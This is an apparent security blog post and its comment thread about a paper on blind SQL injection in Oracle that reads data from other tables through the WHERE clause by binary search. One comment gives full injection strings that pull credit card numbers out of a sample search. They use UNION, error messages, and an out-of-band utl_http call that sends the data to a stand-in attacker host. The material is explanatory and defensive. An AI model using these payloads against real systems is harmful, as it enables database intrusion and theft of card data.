SQL Injection - accessing additional tables via the where clause
Jaromir then extends the technique to guess the length of a column of a table that he is interested in (Say the credit card number column) and then he extends further to guess the character at each position in each field (column) for each row (the count above).
Jaromir includes examples for reading numbers and strings written in the groovy language and includes a source code download as well as fully worked examples as an appendix.
The paper is titled "Reading Data with the Where Clause", very nice piece of work.
There has been 7 Comments posted on this article
September 29th, 2009 at 07:00 pm
Pete Finnigan says:
Why so complicated? In the vulnerable code there are much easier ways to get the data from other tables.
------------------------------------------
INPUT: Bud (Original statement)
select product_id, product_name
from product where product_name like 'Bud%';
------------------------------------------
--SQL Injection Using Union (In-Band)
INPUT: Bud' and 1=0 union select customer_i,cc_number from credit_card--
select product_id, product_name
from product where product_name like 'Bud' and 1=0 union select customer_i,cc_number from creditcard--%';
------------------------------------------
-- SQL Injection Using error messages (In-Band)
INPUT: ' or 1=utl_inaddr.get_host_address((select customer_icc_number from credit_card where rownum=1))--
select product_id, product_name
from product where product_name like '' or 1=utl_inaddr.get_host_address((select customer_icc_number from credit_card where rownum=1))--%';
------------------------------------------
-- SQL Injection Using (Out-of-band), requires
INPUT: ' and 1=utl_http.request('http://www.hacker.com/'(select customer_icc_number from credit_card where rownum=1 ))--
select product_id, product_name
from product where product_name like '' and 1=utl_http.request('http://www.hacker.com/'(select customer_icc_number from credit_card where rownum=1 ))--%';
------------------------------------------
More details (Blind, ...) in one of my sql injection presentations...
http://www.red-database-security.com/wp/confidence2009.pdf
Regards
Alexander
Co-Author of "SQL Injection Attacks and Defense" - Syngress
September 29th, 2009 at 07:33 pm
Pete Finnigan says:
Hi Alex, Joxean
I am aware of all of the methods you suggest of course; indeed I have written about them here many times and also for other publications.
It will be nice if Jaromir can respond here to your observations, I think what he is trying to show - as i said above is inference and how it can be used to read data from other tables. I know others have written papers on a similar theme in the past - Chris Anley I think did so; i just thought it was nice that he shows step by step for those who do not know the technique how to "infer" data values.
cheers
Pete
September 29th, 2009 at 09:28 pm
Pete Finnigan says:
Hi Pete,
Thanks for mentioning my document in your blog and the nice review.
Alex, Joxean - my intention was to point out the threat of SQL injection, so the performance and complexity of the approach was not the first criterion. Of course I agree the UNION or error message injection in your comments gives a much simple way to get the same result in the scenario of my example. Anyway I find the logarithmic search usable in some scenarios where the application provides only a limited output.
Regards,
Jaromir D.B. Nemec
September 30th, 2009 at 12:42 am
Pete Finnigan says:
Pete,
thanks for the clarification.
The sentence "Normal wisdom says that if you can only manipulate the where clause you cannot access the data in tables not included in the existing FROM clause" was confusing me. What is normal wisdom? Naive people?
The algorithm used by Jaromir is called "Binary Search" not "Newton-Raphson" (which is something different).
For details and differences between both algorithms, see wikipedia:
http://en.wikipedia.org/wiki/Binary_search
http://en.wikipedia.org/wiki/Newton-Raphson
And Jaromir's code is not guessing (Binary Guess), the code is searching (Binary Search) even if the source says something
different. ;-)
Jaromir,
In your logfile it took 91 attempts to guess the creditcard number "1929-10100-01". This can be even faster
using less than 50 attempts by using an enhanced implementation of the binary search.
September 30th, 2009 at 08:40 am
Pete Finnigan says:
Hi Alex,
No normal wisdom is not naive people.
Remember you have spent years looking at this stuff, 99.99% (thats not a scientific study by the way, its a "turn of phrase" of the rest of the population hasn't spent the time.
For people who don't know SQL injection and just know SQL, common sense "says" you cannot access data in a table that is not in the FROM clause from there WHERE clause by showing that data in the SELECT clause. That's all i mean
Of course we both know that it is possible; as i said before.
I also know its not Newton-Raphson, i mean it's a "similar" technique (again think commentary on someone elses paper not scientific research), homing in on the answer, Newton-Raphson is used where there are two unknowns, in Jaromir's case there is only one. I was trying to write commentary and liken the method to something I know, thats all.
cheers
Pete
October 1st, 2009 at 06:41 am
Pete Finnigan says:
To avoid confusion and to focus on the original idea I modified the setup. The vulnerable select returns only a Boolean information (available / not found).
@Alex - the mention of "guessing" goes back to the Number Guessing Game that was the inspiration. I will try to optimise the binary search as you suggested. But I have not much hope that this access method will end with performance comparable at least with FTS
Regards,
Jaromir
September 29th, 2009 at 06:38 pm
Pete Finnigan says:
Eeeerr... You can almost always access data from other tables if you can inject something: Simply, inject an UNION.